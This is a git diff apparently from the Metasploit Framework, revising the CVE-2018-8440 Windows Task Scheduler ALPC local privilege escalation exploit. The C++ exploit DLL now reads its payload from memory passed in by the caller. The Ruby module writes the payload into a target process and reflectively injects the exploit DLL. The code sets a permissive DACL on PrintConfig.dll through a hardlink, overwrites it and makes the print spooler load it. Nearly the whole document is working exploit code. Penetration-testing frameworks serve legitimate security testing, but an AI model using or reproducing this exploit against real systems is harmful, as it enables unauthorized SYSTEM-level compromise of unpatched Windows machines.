diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll index 95416fd182..482ee17d14 100755 Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll differ diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp index 23dbb695b0..9ffc5edc10 100755 Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp differ diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib index 335264056d..5c68391ac7 100755 Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib differ diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb index 71d9bea5d5..903d74c36c 100755 Binary files a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb differ diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp index 8ede068a30..b081e10b76 100755 --- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp @@ -77,7 +77,7 @@ void RunExploit() _SchRpcSetSecurity(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0); } -int mainf() +int mainf(LPVOID lpReserved) { //We enumerate the path of PrintConfig.dll, which we will write the DACL of and overwrite to hijack the print spooler service //You might want to expand this code block with FindNextFile .. as there may be multiple prnms003.inf_amd64* folders since older versions do not get cleaned up it in some rare cases. @@ -112,37 +112,21 @@ int mainf() CreateNativeHardlink(jobPath, prntCnfg); RunExploit(); - HANDLE hPayload = ::CreateFile(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); - if (hPayload == INVALID_HANDLE_VALUE) { - return(-1); - } - - DWORD payloadSize = ::GetFileSize(hPayload, NULL); - - VOID* payloadBuffer = malloc(payloadSize); - if (payloadBuffer == NULL) { - return(-1); - } - - DWORD bytesRead; - ::ReadFile(hPayload, payloadBuffer, payloadSize, &bytesRead, NULL); - if (payloadSize != bytesRead) { - return(-1); - } + MEMORY_BASIC_INFORMATION lpBuffer; + VirtualQuery(lpReserved, &lpBuffer, sizeof(MEMORY_BASIC_INFORMATION)); //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue HANDLE hFile; DWORD dwBytesWritten = 0; do { hFile = CreateFile(prntCnfg, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); - WriteFile(hFile, (char*)payloadBuffer, bytesRead, &dwBytesWritten, NULL); + WriteFile(hFile, (char*)lpBuffer.AllocationBase, (DWORD)lpBuffer.RegionSize, &dwBytesWritten, NULL); if (hFile == INVALID_HANDLE_VALUE) { Sleep(5000); } } while (hFile == INVALID_HANDLE_VALUE); CloseHandle(hFile); - CloseHandle(hPayload); //After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service. CoInitialize(nullptr); @@ -159,9 +143,9 @@ int mainf() return 0; } -DWORD CALLBACK ExploitThread(LPVOID hModule) +DWORD CALLBACK ExploitThread(LPVOID lpReserved) { - mainf(); - FreeLibraryAndExitThread((HMODULE)hModule, 0); + mainf(lpReserved); + FreeLibraryAndExitThread(GetModuleHandle(NULL), 0); return 0; } \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp index c48f4271c8..89c1f29d38 100755 --- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp @@ -11,7 +11,7 @@ BOOL APIENTRY DllMain(HMODULE hModule, switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: - CreateThread(NULL, 0, ExploitThread, hModule, 0, NULL); + CreateThread(NULL, 0, ExploitThread, lpReserved, 0, NULL); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c index 5358d1a939..54b8360739 100755 --- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c @@ -4,7 +4,7 @@ /* File created by MIDL compiler version 8.00.0603 */ -/* at Wed Sep 19 07:57:18 2018 +/* at Wed Sep 19 20:58:45 2018 */ /* Compiler settings for rpc.idl: Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h index c92869566a..d216044a65 100755 --- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h @@ -4,7 +4,7 @@ /* File created by MIDL compiler version 8.00.0603 */ -/* at Wed Sep 19 07:57:18 2018 +/* at Wed Sep 19 20:58:45 2018 */ /* Compiler settings for rpc.idl: Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c index 28b9c7d4d4..39f854b42b 100755 --- a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c @@ -4,7 +4,7 @@ /* File created by MIDL compiler version 8.00.0603 */ -/* at Wed Sep 19 07:57:18 2018 +/* at Wed Sep 19 20:58:45 2018 */ /* Compiler settings for rpc.idl: Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 diff --git a/modules/exploits/windows/local/alpc_taskscheduler.rb b/modules/exploits/windows/local/alpc_taskscheduler.rb index 0bf8894537..983869a7c6 100644 --- a/modules/exploits/windows/local/alpc_taskscheduler.rb +++ b/modules/exploits/windows/local/alpc_taskscheduler.rb @@ -95,38 +95,23 @@ class MetasploitModule < Msf::Exploit::Local @process_name = datastore['PROCESS'] || 'notepad.exe' end - def overwrite_payload_path(exploit_data) - # The payload path is hard-coded into the exploit - # We need to change it, but the exploit binary is in UTF-16LE - # But our parsers (right now) expect it to be encoded as ANSI-8bit - # Covert the exploit binary to UTF-16, switch the values, then return - # the encoding to whatever it was to begin with - print_status("Attempting to change the payload path to #{payload_path}...") - - if payload_path.length > original_path.length - fail_with(Failure::BadConfig,"Parameter PAYLOAD_NAME may not exceed #{original_path.length} characters, including extension") - end - - original_encoding = exploit_data.encoding - padded_path = payload_path + ("\x00" * (original_path.length-payload_path.length)) - - padded_path.encode!("UTF-16LE") - original_path.encode!("UTF-16LE") - exploit_data.force_encoding("UTF-16LE") - - exploit_data.sub!(original_path, padded_path) - exploit_data.force_encoding(original_encoding) - end - def inject_magic(process) library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll') library_path = ::File.expand_path(library_path) dll_data = '' ::File.open(library_path, 'rb') { |f| dll_data = f.read } - overwrite_payload_path(dll_data) + + print_status("Writing payload dll into process #{process.pid} memory") + payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE) + written = process.memory.write(payload_addr, payload_dll) + + if written != payload_dll.length + fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory') + end + print_status("Reflectively injecting the exploit DLL into #{process.pid}...") exploit_mem, offset = inject_dll_data_into_process(process, dll_data) - process.thread.create(exploit_mem + offset) + process.thread.create(exploit_mem + offset, payload_addr) end def validate_active_host